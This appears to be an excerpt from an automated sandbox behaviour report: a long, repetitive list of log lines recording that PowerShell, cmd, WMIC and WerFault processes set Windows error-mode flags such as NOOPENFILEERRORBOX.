Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
